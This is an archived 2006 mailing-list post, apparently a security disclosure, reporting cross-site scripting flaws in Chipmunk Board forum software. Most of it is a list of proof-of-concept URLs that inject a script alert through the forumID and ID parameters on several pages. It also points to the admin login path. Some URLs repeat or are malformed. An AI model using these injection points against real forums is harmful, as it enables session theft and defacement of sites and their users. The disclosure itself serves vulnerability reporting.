Multiple Xss exploits in Chipmunk Board

["black code" <black-cod3@xxxxxxxxxxx>]

> Subject: Multiple Xss exploits in Chipmunk Board
> Date: 27 May 2006 10:51:30 -0000
> Multiple Xss exploits in Chipmunk Board
>
> forum type : Chipmunk Board
> bug found by : black-code&sweet-devil
> team : site-down
> type : Xss
>
> black-code:
>
> codes :
>
> http://www.example.com/board/index.php?forumID='><script>alert(10)</script>
>
> http://www.example.com/board/newtopic.php?forumID='><script>alert(10)</script>
>
> http://www.example.com/board/reply.php?forumID='><script>alert(10)</script>
>
> http://www.example.com/board/edit.php?forumID&ID='><script>alert(10)</script>
>
> http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><script>alert(10)</script>
>
> http://www.example.com/board/edit.php?forumID=forumID&ID='><script>alert(10)</script>
>
> http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><script>alert(10)</script>
>
> http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><script>alert(10)</script>
>
> http://www.example.com/board/newtopic.php?forumID='><script>alert(10)</script>
>
>
>
>
> path to admin login:
>
> http://www.xxx.com/path/admin
>
> All my respect to my friend sweet-devil , lezr.com , g123g.net ..
>
> done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/